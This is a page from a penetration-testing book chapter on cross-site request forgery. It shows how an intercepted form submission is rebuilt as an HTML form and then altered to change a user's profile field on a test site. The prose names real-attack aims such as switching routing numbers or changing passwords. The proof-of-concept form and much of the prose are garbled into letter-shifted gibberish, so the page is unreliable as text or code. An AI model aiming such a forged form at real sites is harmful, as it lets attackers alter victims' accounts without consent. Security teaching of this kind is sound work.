Page 111 - Hands-On Bug Hunting for Penetration Testers

P. 111

CSRF and Insecure Session Authentication Chapter 6

GPSN
IUNM

You can see the form's FODUZQF attribute is pulled directly from the intercepted
requestbNFUIPE and the URL value for the BDUJPO attributes too. In fact, this entire
snippet is simply a reverse-engineered expression of the submission in HTML. We know
what HTTP request the form created d now we've written the code to produce that
behavior.
This code imitates the form on the original XFCTDBOUFTU DPN page. But in the case of a
real, malicious CSRF attack, the attacker probably wouldn't want to just trigger an exact
duplicate of an ordinary request the user had already made. More likely, they'd alter it for
their own purposes d switching financial routing numbers, changing account passwords, or
altering some other piece of critical information.

In this case, the form fields might not be as ripe for exploitation, but the principal holds for
more dangerous situations.

Let's still have a little fun by promoting 1SJWBUF .BOEFMMB to his rightful rank of major.
Here's the altered code:

IUNM
GPSN FODUZQF BQQMJDBUJPO Y XXX GPSN VSMFODPEFE NFUIPE 1045
BDUJPO IUUQ XFCTDBOUFTU DPN DSPTTUSBJOJOH BCPVUZPV QIQ
MBCFM GOBNF MBCFM JOQVU UZQF UFYU WBMVF 8JMMJBN
OBNF GOBNF
MBCFM OJDL MBCFM JOQVU UZQF UFYU WBMVF .BKPS .BOEFMMB
OBNF OJDL
MBCFM MOBNF MBCFM JOQVU UZQF UFYU WBMVF .BOEFMMB
OBNF MOBNF
MBCFM TVCNJU MBCFM JOQVU UZQF UFYU WBMVF TVCNJU
OBNF TVCNJU
JOQVU UZQF TVCNJU
WBMVF IUUQ XFCTDBOUFTU DPN DSPTTUSBJOJOH BCPVUZPV QIQ
GPSN
IUNM

[ 96 ]

106 107 108 109 110 111 112 113 114 115 116